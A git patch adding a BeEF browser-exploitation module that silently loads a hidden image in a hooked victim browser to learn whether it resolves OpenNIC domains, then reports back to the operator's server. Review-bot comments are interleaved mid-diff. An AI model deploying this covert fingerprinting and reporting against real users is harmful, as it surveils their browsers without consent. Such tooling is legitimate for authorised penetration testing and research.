From 57ab7fda8476e696c2cc596c6d77f51dcdfeeaa0 Mon Sep 17 00:00:00 2001
From: bcoles
Date: Sun, 13 Mar 2022 02:11:17 +1100
Subject: [PATCH] Detect OpenNIC DNS (#2341)
---
modules/network/detect_opennic/command.js | 43 ++++++++++++++++++++++
modules/network/detect_opennic/config.yaml | 15 ++++++++
modules/network/detect_opennic/module.rb | 19 ++++++++++
3 files changed, 77 insertions(+)
create mode 100644 modules/network/detect_opennic/command.js
create mode 100644 modules/network/detect_opennic/config.yaml
create mode 100644 modules/network/detect_opennic/module.rb
diff --git a/modules/network/detect_opennic/command.js b/modules/network/detect_opennic/command.js
new file mode 100644
index 000000000..d1bb77207
--- /dev/null
+++ b/modules/network/detect_opennic/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ if (document.getElementById('opennic_img_<%= @command_id %>')) {
+ return "Img already created";
+ }
+
+ var img = new Image();
+ img.setAttribute("style", "visibility:hidden");
+ img.setAttribute("width", "0");
+ img.setAttribute("height", "0");
+ img.src = '<%= @opennic_resource %>';
+ img.id = 'opennic_img_<%= @command_id %>';
+ img.setAttribute("attr", "start");
+ img.onerror = function() {
+ this.setAttribute("attr", "error");
+ };
+ img.onload = function() {
+ this.setAttribute("attr", "load");
+ };
+
+ document.body.appendChild(img);
+
+ setTimeout(function() {
+ var img = document.getElementById('opennic_img_<%= @command_id %>');
+ if (img.getAttribute("attr") == "error") {
+ beef.debug('[Detect OpenNIC] Browser is not resolving OpenNIC domains.');
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser is not resolving OpenNIC domains.');
+ } else if (img.getAttribute("attr") == "load") {
+ beef.debug('[Detect OpenNIC] Browser is resolving OpenNIC domains.');
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser is resolving OpenNIC domains.');
+ } else if (img.getAttribute("attr") == "start") {
+ beef.debug('[Detect OpenNIC] Timed out. Cannot determine if browser is resolving OpenNIC domains.');
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timed out. Cannot determine if browser is resolving OpenNIC domains.');
+ };
+ document.body.removeChild(img);
+ }, <%= @timeout %>);
+
+});
diff --git a/modules/network/detect_opennic/config.yaml b/modules/network/detect_opennic/config.yaml
new file mode 100644
index 000000000..45a39a36d
--- /dev/null
+++ b/modules/network/detect_opennic/config.yaml
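Review bot: The `error` branch in the `setTimeout` callback reports a definite negative, but an image `error` event also fires when the request is blocked or upgraded as mixed content on an HTTPS page, when a content blocker intervenes, or when the host is unreachable or returns a non-image body, so the result overstates what was observed. I would word it as what was measured, e.g. `'result=Image failed to load; OpenNIC resolution could not be confirmed.'`. Separately, the callback re-queries the element with `getElementById` and calls `img.getAttribute(...)` without a null check; if the page has removed the node in the meantime the callback throws and no result is sent, and `removeChild` would throw as well. The outer `img` is already in scope, so dropping the inner `var img = ...` line and guarding the cleanup with `if (img.parentNode) img.parentNode.removeChild(img);` avoids both.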
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ detect_opennic:
+ enable: true
+ category: "Network"
+ name: "Detect OpenNIC DNS"
+ description: "This module will detect if the zombie is currently using OpenNIC DNS resolvers.

Note that the detection may fail when attempting to load a HTTP resource from a hooked HTTPS page."
+ authors: ["wade", "pdp", "bm", "xntrik", "bcoles"]
+ target:
+ working: ["ALL"]
diff --git a/modules/network/detect_opennic/module.rb b/modules/network/detect_opennic/module.rb
new file mode 100644
index 000000000..09827bbde
--- /dev/null
+++ b/modules/network/detect_opennic/module.rb
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_opennic < BeEF::Core::Command
+ def self.options
+ [
+ { 'name' => 'opennic_resource', 'ui_label' => 'What OpenNIC image resource to request', 'value' => 'http://be.libre/lang/flag/us.png' },
+ { 'name' => 'timeout', 'ui_label' => 'Detection timeout', 'value' => '10000' }
+ ]
+ end
+
+ def post_execute
+ return if @datastore['result'].nil?
+
+ save({ 'result' => @datastore['result'] })
+ end
+end
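Review bot: Neither option in `self.options` is checked before command.js substitutes it into the generated script: `timeout` lands bare as the `setTimeout` delay and `opennic_resource` inside a single-quoted string literal, so a non-numeric timeout or a URL containing `'` yields a script that fails to parse rather than a reported result. A comment above the options would at least record the constraint, e.g. `# Both values are substituted into command.js unescaped: timeout must be an integer (ms), opennic_resource must not contain quotes`. The default resource is also a plain-`http://` URL on a third-party host, so when that host is down, or the page is HTTPS, every run reports a negative or a timeout regardless of the resolver in use; that dependency is worth stating in the `ui_label` or the module description.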